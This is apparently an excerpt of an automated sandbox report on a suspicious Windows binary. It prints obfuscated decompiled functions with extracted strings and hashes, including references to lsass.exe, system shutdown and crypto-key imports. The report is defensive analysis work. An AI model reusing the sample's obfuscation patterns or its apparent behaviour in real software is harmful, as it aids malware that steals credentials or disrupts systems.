                      					_push(1);
                      					E004A800F();
                      					_push(0x9819);
                      					_push(1);
                      					_t38 = L00467ED3("WFServicesReg.exe", _t111);
                      					if(0x11 > 0) {
                      						L8:
                      						if(_t38 <= 0x13035d) {
                      							L10:
                      							 *0x5091fa = _t100;
                      							L11:
                      							 *0x509210 = _t100;
                      							 *0x50b62a =  *0x50b62a - _t111;
                      							 *((intOrPtr*)(_t116 - 8)) = _t116 - 0x5c;
                      							_t42 =  *((intOrPtr*)(_t116 - 8));
                      							if(_t88 >= _t88) {
                      								 *0x50917e = _t88;
                      								_t100 = 0x9570;
                      								 *0x509218 =  *0x509218 + 0x9570;
                      							}
                      							_t112 = _t111 + 0xa9628a;
                      							 *((intOrPtr*)(_t116 - 8)) = _t42;
                      							_t44 =  *((intOrPtr*)(_t116 - 8));
                      							_t71 = "MapUserPhysicalPages";
                      							 *(_t116 - 0x14) = _t71;
                      							if(_t71 == _t71) {
                      								if(_t71 <= _t71) {
                      									 *0x50914e = _t88;
                      								}
                      							}
                      							_t89 = 0x7ed4;
                      							 *0x5091ce =  *0x5091ce - _t100;
                      							_t102 = _t100 + _t100 + 0xa640;
                      							_t113 = _t112 >> 0x7ed4;
                      							_t75 =  *0x50bf14; // 0x0
                      							 *0x50bf17 = _t44;
                      							 *((intOrPtr*)(_t116 - 0x70)) = _t44;
                      							 *((intOrPtr*)(_t116 - 8)) = _t44;
                      							_t77 = _t75;
                      							if(0x18a298 < 0x1fb4db) {
                      								L22:
                      								if(_t89 >= _t89) {
                      									 *0x5091da =  *0x5091da + _t102;
                      								}
                      								goto L24;
                      							} else {
                      								 *(_t116 - 0x10) = _t77;
                      								_t79 = _t77 - 0x42e3;
                      								 *0x50bf0c =  *0x50bf0c + _t79;
                      								_t80 = _t79 + _t79;
                      								if(0x7ed4 < 0x7ed4) {
                      									 *0x5091a4 = _t102;
                      									_t102 = 0xa180;
                      									 *0x509228 =  *0x509228 + _t113;
                      									 *0x50bf12 =  *0x50bf12 + 0x18a298;
                      								}
                      								_t77 = _t80 + 0x35;
                      								if(_t77 != 0x3d) {
                      									L24:
                      									_push( *((intOrPtr*)(_t116 - 0x70)));
                      									 *((intOrPtr*)(_t116 - 0xc)) =  *((intOrPtr*)(_t116 - 8));
                      									_push(0x4aee58);
                      									goto ( *0x509d28);
                      								} else {
                      									 *(_t116 - 0x18) = _t77;
                      									_t89 = 0x5936cc;
                      									goto L22;
                      								}
                      							}
                      						}
                      						 *0x509178 = 0x640b;
                      						_t88 = 0xc816;
                      						if((_t100 & 0x0000008e) > 0) {
                      							goto L11;
                      						}
                      						goto L10;
                      					}
                      					if(0x800 == 0) {
                      						_t38 = 0xdd;
                      					}
                      					 *0x50bf07 =  *0x50bf07 + _t38;
                      					goto L8;
                      				}
                      				_t28 =  *(_t116 - 0x10);
                      				 *0x5090c6 =  *0x5090c6 - 0x2fcf8e;
                      				if(_t85 < _t85 || _t85 < _t85) {
                      					goto L3;
                      				} else {
                      					goto L4;
                      				}
                      			}
























                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: IMCCPHR.exe$InitiateSystemShutdownExA$MapUserPhysicalPages$WFServicesReg.exe$WSManHTTPConfig.exe$activeds.dll
                      • API String ID: 0-1092097195
                      • Opcode ID: 8841a4c8c28e669aae19f29d91c15a29f8f4bd8b23fb50f30fb23d6c09cd46a0
                      • Instruction ID: 1e444521789988b19af727572d314d1e2668d7a6ad5a03ce4c01d64fcb007be3
                      • Opcode Fuzzy Hash: 8841a4c8c28e669aae19f29d91c15a29f8f4bd8b23fb50f30fb23d6c09cd46a0
                      • Instruction Fuzzy Hash: E5512469B406078BDB00AF79DC953CE3BB1EB3A324F08052AD824D73A6E3790949DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CryptReleaseContext.ADVAPI32(?), ref: 004B783D
                      Strings
                      • dpnet.dll, xrefs: 004B78A9
                      • Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll, xrefs: 004B7858
                      • ucmhc.dll, xrefs: 004B787F
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ContextCryptRelease
                      • String ID: Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$dpnet.dll$ucmhc.dll
                      • API String ID: 829835001-2037219039
                      • Opcode ID: 35eabc3f5b69a24b4a15323c02b9e612735fd2a5a6be210ac90e2503cf96c8cb
                      • Instruction ID: 5b1bf4178d016d0eeaf54669bf071c3488f063532e1a5eaf2e3cdc592f457f04
                      • Opcode Fuzzy Hash: 35eabc3f5b69a24b4a15323c02b9e612735fd2a5a6be210ac90e2503cf96c8cb
                      • Instruction Fuzzy Hash: CE418CB4E5420A9BCF00EFB9D8D85DEBBB0FB29324F50407AA844E7355E3385A89D750
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 29%
                      			E004B3B61(intOrPtr __eax, void* __ebx, void* __ecx, short __edx, void* __edi, void* __eflags) {
                      				intOrPtr _t23;
                      				intOrPtr _t26;
                      				intOrPtr _t27;
                      				int _t30;
                      				char _t33;
                      				void* _t42;
                      				intOrPtr _t43;
                      				unsigned short _t50;
                      				short _t54;
                      				void* _t58;
                      				void* _t61;
                      
                      				_t58 = __edi;
                      				_t54 = __edx;
                      				 *((intOrPtr*)(_t61 - 0x1c)) =  *((intOrPtr*)(_t61 - 0x1c)) + __ecx;
                      				 *((intOrPtr*)(_t61 - 8)) = __eax;
                      				 *((intOrPtr*)(_t61 - 0x18)) = 0x81d99b;
                      				_t23 =  *((intOrPtr*)(_t61 - 8));
                      				 *((intOrPtr*)(_t61 - 8)) = _t23;
                      				_push(_t23);
                      				L00468BBD(_t23, __edx);
                      				_t26 =  *((intOrPtr*)(_t61 - 8));
                      				_push(0);
                      				_t42 = 0x3fbb5b;
                      				 *((intOrPtr*)(_t61 - 8)) = _t26;
                      				if(_t26 <= 0x163dad) {
                      					 *0x5090d0 =  *0x5090d0 - 0x2b7473;
                      					_t42 = 0x56e8e6;
                      				}
                      				_t43 = _t42 + 0x57df;
                      				_t27 =  *((intOrPtr*)(_t61 - 8));
                      				_t50 = 0x5fc2 >> 0x5fc2;
                      				_push( *((intOrPtr*)(_t61 - 0x48)));
                      				 *((intOrPtr*)(_t61 - 8)) = _t27;
                      				if(_t27 < 0x1b) {
                      					L9:
                      					 *0x509128 =  *0x509128 + _t50;
                      					goto L10;
                      				} else {
                      					if(_t43 < 0x328a) {
                      						L6:
                      						 *((intOrPtr*)(_t61 - 0x24)) =  *((intOrPtr*)(_t61 - 0x24)) - _t50;
                      						_t54 = 0xa0ec;
                      						 *0x509226 = 0xa0ec;
                      						_t33 =  *0x50bf13; // -9
                      						 *0x50bf15 = _t33;
                      						 *0x509668 =  *0x509668 - _t58 - 0xcff825;
                      						 *0x509518 = 0xf4;
                      						if(0xf4 != 0x1bee || _t43 < 0x355653) {
                      							goto L9;
                      						}
                      						L10:
                      						 *0x5091da = _t54;
                      					} else {
                      						if(_t43 < _t43) {
                      							_t43 =  *((intOrPtr*)(_t61 - 0x1c));
                      							_t50 = 0x69bb;
                      							 *0x509170 =  *0x509170 + 0x69bb;
                      							goto L6;
                      						}
                      					}
                      				}
                      				 *0x50b22e =  *0x50b22e;
                      				_t30 = CryptReleaseContext(??, ??);
                      				 *0x509568 = _t30;
                      				return  *((intOrPtr*)(_t61 - 0x5c));
                      			}















                      APIs
                      • CryptReleaseContext.ADVAPI32(?,?,?), ref: 004B3C6E
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ContextCryptRelease
                      • String ID: RtlReleaseRelativeName$SV5$st+
                      • API String ID: 829835001-2574096031
                      • Opcode ID: d89a7d26d0a86216760b684e993551476292340997ff74c3bf986ae641cd2055
                      • Instruction ID: e8dc4c8006a0ec7c266d397f5c738f28292400b43a18401d5e95d32d2c62cd31
                      • Opcode Fuzzy Hash: d89a7d26d0a86216760b684e993551476292340997ff74c3bf986ae641cd2055
                      • Instruction Fuzzy Hash: 52219479E003069BDB00EFB9E8955DDBFB0EB38320B44457AD841E731AE3785A4ADB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 004B8E88
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CreateSnapshotToolhelp32
                      • String ID: _ui64toa_s$activeds.dll$api-ms-win-core-namedpipe-l1-1-0.dll
                      • API String ID: 3332741929-3656634258
                      • Opcode ID: 551a6195d923ab31afb6d34c714b8f12ff5e1725618d77e71cf9186b62d221b0
                      • Instruction ID: 6a24f68cae3ef29d6c43a329698d717df75aff52304d187eb265c54f8160fead
                      • Opcode Fuzzy Hash: 551a6195d923ab31afb6d34c714b8f12ff5e1725618d77e71cf9186b62d221b0
                      • Instruction Fuzzy Hash: 52219262B493468FE7119B78ECD92CD3B71973A320B0C092ECC54873A6E768094DEB59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 66%
                      			E004AF42D() {
                      				void* _t26;
                      				intOrPtr _t31;
                      				intOrPtr _t41;
                      				intOrPtr _t43;
                      				unsigned short _t44;
                      				intOrPtr _t64;
                      				intOrPtr _t65;
                      				short _t66;
                      				void* _t67;
                      				signed int _t68;
                      				void* _t70;
                      				void* _t71;
                      				void* _t73;
                      				short _t77;
                      
                      				if(_t26 == 0x295367) {
                      					 *0x50bf0b =  *0x50bf0b + _t44;
                      				}
                      				_t61 = 0x5d62;
                      				_push( *((intOrPtr*)(_t73 - 0x74)));
                      				_t66 =  *0x5091b2; // 0x23e0
                      				 *0x509202 = _t66;
                      				_t67 = _t66 + _t66;
                      				_t31 =  *((intOrPtr*)(_t73 - 8));
                      				 *((intOrPtr*)(_t73 - 0x14)) = _t31;
                      				if((_t44 >> 0x5d62) - 0x40 >= 0x3a) {
                      					 *0x50913a = 0x5d62;
                      					_t65 =  *0x50916c; // 0x0
                      					_t61 = _t65 - 0x72d99b;
                      					_t77 = _t61;
                      				}
                      				 *((intOrPtr*)(_t73 - 8)) = _t31;
                      				_push( *((intOrPtr*)(_t73 + 8)));
                      				E004ACC6C(0 + 0x433989, _t61, _t67, _t70, _t71, _t77,  *((intOrPtr*)(_t73 - 8)));
                      				_t41 =  *((intOrPtr*)(_t73 - 8));
                      				if(0x433989 < 0x3d46) {
                      					 *0x509160 = 0x5cd0;
                      					_t64 =  *0x509192; // 0x9624
                      					_t61 = _t64 - 0x843c;
                      					_t67 = 0;
                      				}
                      				 *((intOrPtr*)(_t73 - 8)) = _t41;
                      				_t43 =  *((intOrPtr*)(_t73 - 8));
                      				_push( *((intOrPtr*)(_t73 - 0x60)));
                      				 *0x50bf0f =  *0x50bf0f - _t61;
                      				if(_t61 < _t61) {
                      					L9:
                      					if(_t43 < 0) {
                      						 *0x50938c = _t43;
                      					}
                      					goto L12;
                      				} else {
                      					_t68 = _t67 + 0x8653;
                      					if((_t68 & 0x00869d5a) >= 0) {
                      						L12:
                      						_push(E004AF56D);
                      						goto ( *0x509ca4);
                      					}
                      					 *0x509200 = _t68;
                      					goto L9;
                      				}
                      			}


















                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: :$F=$_isdel.exe
                      • API String ID: 0-1020594911
                      • Opcode ID: 69f2468ce64e4ea9d5a12a22d6e7df0a52eb4ca31ddd4aebb5222c1d1d868dc8
                      • Instruction ID: 626155428d94295765ed1551991dd3ef19cdaf25fc962a4917612fd6598ce19f
                      • Opcode Fuzzy Hash: 69f2468ce64e4ea9d5a12a22d6e7df0a52eb4ca31ddd4aebb5222c1d1d868dc8
                      • Instruction Fuzzy Hash: EA315831E00206AFCB00DFB9D8C46CDBBB1EF3A314F04856A9955E7326D2348A49DB08
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 40%
                      			E004C3A08(void* __eax) {
                      				HCRYPTKEY* _t19;
                      				void* _t25;
                      
                      				if(__eax == 0) {
                      					L3:
                      					return  *((intOrPtr*)(_t25 - 0x30));
                      				} else {
                      					 *(_t25 - 0x24) = _t25 - 8;
                      					if(CryptImportKey( *(_t25 - 4),  *(_t25 + 8),  *(_t25 + 0xc), 0, 0,  *(_t25 - 0x24)) == 0) {
                      						goto L3;
                      					} else {
                      						 *(_t25 - 0x10) =  *(_t25 - 0x20);
                      						_push(0);
                      						_t19 = _t25 - 0x10;
                      						 *(_t25 - 0x24) = _t19;
                      						_push( *(_t25 - 0x24));
                      						_push(0);
                      						_push(0);
                      						_push(1);
                      						_push(0);
                      						_push( *(_t25 - 8));
                      						_push(E004C3A61);
                      						_push( *0x50a240);
                      						return _t19;
                      					}
                      				}
                      			}






                      APIs
                      • CryptImportKey.ADVAPI32(?,?,?,00000000,?,?), ref: 004C3A28
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptImport
                      • String ID:
                      • API String ID: 365355273-0
                      • Opcode ID: 3cc5714685345be94b29c4de71ee53b806c07b360f6bb290a4da0adef1b9c332
                      • Instruction ID: a51f42aea2575d448185ba76987689caaca00c0671abf59feb8653b2a4698406
                      • Opcode Fuzzy Hash: 3cc5714685345be94b29c4de71ee53b806c07b360f6bb290a4da0adef1b9c332
                      • Instruction Fuzzy Hash: 4DF0C47A900219AEDF11CFA5CD45EEEBFB5FB08744F104169E904A2150D7729E14EB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004B544E() {
                      				char _v20;
                      				struct _SYSTEMTIME* _v24;
                      				struct _SYSTEMTIME* _t4;
                      
                      				_t4 =  &_v20;
                      				_v24 = _t4;
                      				GetLocalTime(_v24);
                      				return _t4;
                      			}







                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LocalTime
                      • String ID:
                      • API String ID: 481472006-0
                      • Opcode ID: 3ef689930f447c095d30e2da109ef63eb57562a23fc2cf66033b373fb9c4da3e
                      • Instruction ID: ebc7179c63c22954c45e4f9e8422d2a8e84e6f0c7e5e4edc722305024557a26b
                      • Opcode Fuzzy Hash: 3ef689930f447c095d30e2da109ef63eb57562a23fc2cf66033b373fb9c4da3e
                      • Instruction Fuzzy Hash: 92C04C7080020E8BCB00DBA4DD469BEB6BDBB40214B5002619921F12D1E7719B1089E6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E004B2E2B() {
                      				signed char _t18;
                      				signed char _t22;
                      				char _t25;
                      				intOrPtr _t28;
                      				intOrPtr _t37;
                      				short _t42;
                      				void* _t45;
                      				signed int _t47;
                      				void* _t50;
                      
                      				_t28 = 0x42bb59;
                      				_t18 =  *(_t50 - 8);
                      				 *(_t50 - 8) = _t18;
                      				if(_t18 < 0x24) {
                      					L4:
                      					 *0x50920e = _t42;
                      					if((_t47 & 0x00988653) <= 0) {
                      						 *0x50b921 =  *0x50b921 - _t47;
                      						_t25 =  *0x50bf15; // 0x0
                      						_t18 = _t25 - 0xf5;
                      					}
                      					 *0x50b93d =  *0x50b93d + _t45;
                      					 *((intOrPtr*)(_t50 - 0x10)) =  *((intOrPtr*)(_t50 - 0x10)) + _t28;
                      					 *((intOrPtr*)(_t50 - 0x10)) = _t28;
                      					_t22 =  *(_t50 - 8);
                      					_push( *((intOrPtr*)(_t50 - 0x50)));
                      					_t37 =  *0x509146; // 0x380
                      					if(_t37 < _t37) {
                      						 *0x50ab24 =  *0x50ab24 + 0x9c62;
                      						 *0x509230 = _t47;
                      						if((0 & _t22) != 0) {
                      							 *0x50bf15 = 0;
                      							 *(_t50 - 8) = _t22;
                      						}
                      					}
                      					_push(0x4b2f12);
                      					goto ( *0x509ca4);
                      				}
                      				_t18 = 0x50bf0a;
                      				if(0x42bb59 > 0x2e7472) {
                      					 *0x50bf0b =  *0x50bf0b - 0x42bb59;
                      				}
                      				 *((intOrPtr*)(_t50 - 0x18)) = _t28;
                      				_t28 =  *((intOrPtr*)(_t50 - 0x1c));
                      				 *((intOrPtr*)(_t50 - 0x20)) =  *((intOrPtr*)(_t50 - 0x20)) - 0x631a;
                      				 *0x509176 = 0x631a;
                      				_t42 = _t42 + 0x8d;
                      				goto L4;
                      			}













                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: rt.
                      • API String ID: 0-1068618769
                      • Opcode ID: 2037c95c67230bb1eda41982af25836228073f692b5bb9d9f27f93e9ecc37bf3
                      • Instruction ID: 4b947e3d59d46738c6f6b977d0f469dd048e60b3cb30255aca487c7700aee380
                      • Opcode Fuzzy Hash: 2037c95c67230bb1eda41982af25836228073f692b5bb9d9f27f93e9ecc37bf3
                      • Instruction Fuzzy Hash: 8121C076D103168FCB00CFA9D9D41CD7BB0FB39300B40456AC805A7336E3B44A49EB59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 33%
                      			E004C3AD6() {
                      				void* _t26;
                      
                      				 *((intOrPtr*)(_t26 - 0x20)) = 0;
                      				 *((intOrPtr*)(_t26 - 0x24)) = _t26 - 0x20;
                      				_push( *((intOrPtr*)(_t26 - 0x24)));
                      				 *((intOrPtr*)(_t26 - 0x24)) = _t26 - 0x1c;
                      				_push( *((intOrPtr*)(_t26 - 0x24)));
                      				_push( *((intOrPtr*)(_t26 - 0x10)));
                      				_push( *((intOrPtr*)(_t26 - 0x18)));
                      				E004AD00C(_t26 - 0x1c);
                      				 *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x14)))) =  *((intOrPtr*)(_t26 - 0x20));
                      				_push( *((intOrPtr*)(_t26 - 0x1c)));
                      				_pop( *__eax);
                      				 *((intOrPtr*)(_t26 - 0x30)) = 1;
                      				_push( *((intOrPtr*)(_t26 - 0x18)));
                      				E004ABEF8();
                      				_push( *((intOrPtr*)(_t26 - 8)));
                      				_push(E004C3B30);
                      				goto ( *0x509e54);
                      			}





                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4e0fdc44793271e06fd89394144cc73afc8686471c30991f77b1b0d292310931
                      • Instruction ID: 2f7333271499ea2db1e115e713e9fe7e4b9ded249cee1430a5861b865e5880d5
                      • Opcode Fuzzy Hash: 4e0fdc44793271e06fd89394144cc73afc8686471c30991f77b1b0d292310931
                      • Instruction Fuzzy Hash: 97F07A7590021AEFDF01CF91C980AEEBBB6FF48304F104059EA0072261D77A5D55DF64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f109f5d16ddb31f5b9b97820428b30be733bfe968a0c40d393b549b8e782473b
                      • Instruction ID: 4e868c2015a995dc8d4725c7ba3993b8228a1c86bc88a4b131290cf9c6aed3f1
                      • Opcode Fuzzy Hash: f109f5d16ddb31f5b9b97820428b30be733bfe968a0c40d393b549b8e782473b
                      • Instruction Fuzzy Hash: 8BE07E3590020DEEDF018FE0C884DEEBAB5FB48304F100069E60072150D6761994AB24
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 16%
                      			E004C3D04(intOrPtr _a4, intOrPtr _a8) {
                      				char _v8;
                      				char* _v12;
                      				intOrPtr _v20;
                      
                      				_v20 = 0;
                      				_v12 =  &_v8;
                      				_push(_v12);
                      				_push(0);
                      				_push(1);
                      				_push(_a8);
                      				_push(_a4);
                      				_push(0x4c3d3c);
                      				goto ( *0x50a24c);
                      			}







                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2179b8e6b2b564be5c3f8d3f4b4eadc6646b396f4dd01bbd2fb8f96ca12d2080
                      • Instruction ID: 25f3b7d93e7db9b4dca5d1ef39389dc8d59065d27084a8d81330c155ab5ed2ab
                      • Opcode Fuzzy Hash: 2179b8e6b2b564be5c3f8d3f4b4eadc6646b396f4dd01bbd2fb8f96ca12d2080
                      • Instruction Fuzzy Hash: 02E01279901208FFDB058F94CC51FED7B75E704310F508168EA11563D0E7B65B54DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 16%
                      			E004C3D56() {
                      				intOrPtr _t8;
                      				void* _t13;
                      
                      				 *((intOrPtr*)(_t13 - 0xc)) = _t8;
                      				 *((intOrPtr*)(_t13 - 8)) = _t13 - 4;
                      				_push( *((intOrPtr*)(_t13 - 8)));
                      				_push( *((intOrPtr*)(_t13 - 0xc)));
                      				_push(1);
                      				_push( *((intOrPtr*)(_t13 + 0xc)));
                      				_push( *((intOrPtr*)(_t13 + 8)));
                      				_push(E004C3D85);
                      				goto ( *0x50a24c);
                      			}






                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf6be5edc4f4c46dd710fb31561d52cd7e8f2a3a012a6111875793ba3695b7b1
                      • Instruction ID: bec5a3b25ab843c079b0d9d50938bca8176b1e590fa0df07320db9b6041d8145
                      • Opcode Fuzzy Hash: cf6be5edc4f4c46dd710fb31561d52cd7e8f2a3a012a6111875793ba3695b7b1
                      • Instruction Fuzzy Hash: 5DE04279901108FFDF0A8F90C850BECBB72EB14301F1080AAA91165260E6765A54AF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 19d76dd14fee378271f1e894edd4fbcf06145261880a372019b64e997e65c6a2
                      • Instruction ID: 7a87d306ab4cdf1a4b37a18fed3dc8b0a9af99824d1bceb6e58330975fd01570
                      • Opcode Fuzzy Hash: 19d76dd14fee378271f1e894edd4fbcf06145261880a372019b64e997e65c6a2
                      • Instruction Fuzzy Hash: 66B09234A00108EEE7048F849C81EA8B375F3187597100468A20002466CA701E48EB04
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 15%
                      			E0047674B(short __ecx, short __edx, signed int __esi) {
                      				unsigned short _t87;
                      				char* _t91;
                      				unsigned short _t93;
                      				_Unknown_base(*)()* _t94;
                      				unsigned short _t97;
                      				unsigned short _t99;
                      				unsigned short _t101;
                      				unsigned short _t104;
                      				unsigned short _t112;
                      				unsigned short _t121;
                      				unsigned short _t125;
                      				unsigned short _t131;
                      				unsigned short _t144;
                      				unsigned short _t149;
                      				char* _t186;
                      				char* _t196;
                      				short _t228;
                      				intOrPtr _t229;
                      				signed char _t246;
                      				void* _t266;
                      				signed char _t267;
                      				unsigned short* _t286;
                      				signed int _t290;
                      				unsigned short _t291;
                      				void* _t294;
                      
                      				_t290 = __esi;
                      				_t265 = __edx;
                      				_t228 = __ecx;
                      				_t87 =  *(_t294 - 8);
                      				 *0x50913a = __ecx;
                      				 *(_t294 - 8) = _t87;
                      				 *(_t294 - 0xc) = _t87;
                      				_push( *((intOrPtr*)(_t294 - 0x58)));
                      				_t91 =  *(_t294 - 8);
                      				if(0x442bb8 >= __ecx) {
                      					if(__ecx < __ecx) {
                      						_t228 = 0x7b51;
                      					}
                      					_t265 = 0xa5;
                      				}
                      				 *0x50bf12 =  &(( *0x50bf12)[_t91]);
                      				 *0x50bf12 = _t91;
                      				_push( *0x5093f8);
                      				_t286 = 0x509624;
                      				 *0x50bf17 =  &(( *0x50bf17)[_t91]);
                      				 *0x50bf17 = _t91;
                      				 *(_t294 - 8) = _t91;
                      				 *(_t294 - 0x10) = _t91;
                      				_t93 =  *(_t294 - 8);
                      				if(_t228 > _t228) {
                      					L8:
                      					goto L9;
                      				} else {
                      					_t228 = 0xffffffffffffff79;
                      					 *0x5091ca = _t265;
                      					_t265 = 0xacb6;
                      					if((_t290 & 0x00a90b15) >= 0) {
                      						L9:
                      					} else {
                      						 *0x50bf15 =  *0x50bf15 + _t93;
                      						 *0x50bf15 =  *0x50bf15 - _t93;
                      						if(0x509624 < 0) {
                      							_t286 = 0x50bf07;
                      							goto L8;
                      						}
                      					}
                      				}
                      				_t229 =  *0x509134; // 0x0
                      				 *0x509168 =  *0x509168 + _t229;
                      				_t94 = GetProcAddress(??, ??);
                      				 *0x5091ea = _t265;
                      				_t266 = _t265 + _t265;
                      				 *(_t294 - 8) = _t94;
                      				 *0x509184 =  *0x509184 + 0x68e3;
                      				 *0x50a614 =  *0x50a614 + _t266;
                      				_t267 = _t266 + _t266;
                      				E00469D4E("lsass.exe", _t229, 0x68e3, _t286, _t267, 0);
                      				_t97 =  *(_t294 - 8);
                      				if(_t97 != 0x1b16) {
                      				}
                      				 *(_t294 - 8) = _t97;
                      				_t99 =  *(_t294 - 8);
                      				 *0x50abd4 = _t99;
                      				 *(_t294 - 8) = _t99;
                      				_t101 =  *(_t294 - 8);
                      				 *(_t294 - 0x10) = _t101;
                      				 *0x509130 = 0x68e3;
                      				 *0x5091c8 = _t267;
                      				 *(_t294 - 8) = _t101;
                      				 *((intOrPtr*)(_t294 - 0x18)) = 0x3853a9;
                      				 *((intOrPtr*)(_t294 - 0x1c)) = 0x3853a9;
                      				_t104 =  *(_t294 - 8);
                      				if((_t267 & 0x00000088) >= 0) {
                      					_t267 = 0x9588;
                      				}
                      				 *(_t294 - 8) = _t104;
                      				 *0x50bf0b =  *0x50bf0b - 0x3853a9;
                      				_push(0);
                      				 *(_t294 - 0x14) = 0;
                      				_t183 = 0;
                      				_t112 =  *(_t294 - 8);
                      				if(_t112 <= 0x2b54) {
                      					_t183 = 0xba6b7a;
                      				}
                      				 *(_t294 - 8) = _t112;
                      				 *0x5096d4 = _t112;
                      				_push( *0x509104);
                      				L00468197(_t183, _t286, _t290,  !( *(_t294 - 8)) +  !( *(_t294 - 8)), 0);
                      				_t186 = "CoLockObjectExternal" + "CoLockObjectExternal";
                      				 *(_t294 - 0x14) = _t186;
                      				_t121 =  *(_t294 - 8);
